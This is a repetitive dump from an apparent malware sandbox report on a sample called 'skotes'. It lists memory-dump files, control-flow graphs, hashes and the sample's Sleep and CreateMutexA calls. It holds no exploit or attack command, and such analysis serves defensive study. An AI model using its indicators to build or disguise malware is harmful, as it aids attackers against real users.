                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: f289677517431b2e1f235791418d1118b79dbf1b1ef4248f20567b44fd62f7a7
                                                                                                                                                                                                                                          • Instruction ID: 6839e1567b49aaaddd1b2d503af3a8e29fa693fd694849ea2cd088bed829bc09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f289677517431b2e1f235791418d1118b79dbf1b1ef4248f20567b44fd62f7a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70315B316042049BEB18EB78DD8976DBBE2DBC6310F24C299E028973D6D7759981C792

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 22 b79f44-b79f64 26 b79f66-b79f72 22->26 27 b79f92-b79fae 22->27 28 b79f74-b79f82 26->28 29 b79f88-b79f8f call b8d663 26->29 30 b79fb0-b79fbc 27->30 31 b79fdc-b79ffb 27->31 28->29 32 b7a92b 28->32 29->27 34 b79fd2-b79fd9 call b8d663 30->34 35 b79fbe-b79fcc 30->35 36 b79ffd-b7a009 31->36 37 b7a029-b7a916 call b880c0 31->37 39 b7a953-b7a994 Sleep CreateMutexA 32->39 40 b7a92b call ba6c6a 32->40 34->31 35->32 35->34 43 b7a01f-b7a026 call b8d663 36->43 44 b7a00b-b7a019 36->44 51 b7a9a7-b7a9a8 39->51 52 b7a996-b7a998 39->52 40->39 43->37 44->32 44->43 52->51 54 b7a99a-b7a9a5 52->54 54->51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: aea3c438331f9be7fb5444df0207c86fd930144119f499e24da0c4b59f97919e
                                                                                                                                                                                                                                          • Instruction ID: acb6c7e321d3311087b8974512b9ae9873936683be6169e5718fbb88d1433c68
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aea3c438331f9be7fb5444df0207c86fd930144119f499e24da0c4b59f97919e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C315B316041048BEB18AB78DC9976CB7E2EBC5310F24C699E028DB3D1D775A981C792

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 56 b7a079-b7a099 60 b7a0c7-b7a0e3 56->60 61 b7a09b-b7a0a7 56->61 64 b7a0e5-b7a0f1 60->64 65 b7a111-b7a130 60->65 62 b7a0bd-b7a0c4 call b8d663 61->62 63 b7a0a9-b7a0b7 61->63 62->60 63->62 66 b7a930 63->66 68 b7a107-b7a10e call b8d663 64->68 69 b7a0f3-b7a101 64->69 70 b7a132-b7a13e 65->70 71 b7a15e-b7a916 call b880c0 65->71 74 b7a953-b7a994 Sleep CreateMutexA 66->74 75 b7a930 call ba6c6a 66->75 68->65 69->66 69->68 77 b7a154-b7a15b call b8d663 70->77 78 b7a140-b7a14e 70->78 85 b7a9a7-b7a9a8 74->85 86 b7a996-b7a998 74->86 75->74 77->71 78->66 78->77 86->85 88 b7a99a-b7a9a5 86->88 88->85
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 31be3f20ab560c3b44de7aac2d19cbc738eb5e1204ffa9643137c8ae73a8a324
                                                                                                                                                                                                                                          • Instruction ID: c542134071467c60a3dec80911efe8d270d1b2aff7411bffe71c8871014053f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31be3f20ab560c3b44de7aac2d19cbc738eb5e1204ffa9643137c8ae73a8a324
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7316A316041009BEB189B78DCC976DB7E2DBC6310F20C699E038A73D1D7769980C792

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 90 b7a1ae-b7a1ce 94 b7a1d0-b7a1dc 90->94 95 b7a1fc-b7a218 90->95 98 b7a1f2-b7a1f9 call b8d663 94->98 99 b7a1de-b7a1ec 94->99 96 b7a246-b7a265 95->96 97 b7a21a-b7a226 95->97 103 b7a267-b7a273 96->103 104 b7a293-b7a916 call b880c0 96->104 101 b7a23c-b7a243 call b8d663 97->101 102 b7a228-b7a236 97->102 98->95 99->98 105 b7a935 99->105 101->96 102->101 102->105 110 b7a275-b7a283 103->110 111 b7a289-b7a290 call b8d663 103->111 107 b7a953-b7a994 Sleep CreateMutexA 105->107 108 b7a935 call ba6c6a 105->108 119 b7a9a7-b7a9a8 107->119 120 b7a996-b7a998 107->120 108->107 110->105 110->111 111->104 120->119 122 b7a99a-b7a9a5 120->122 122->119
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
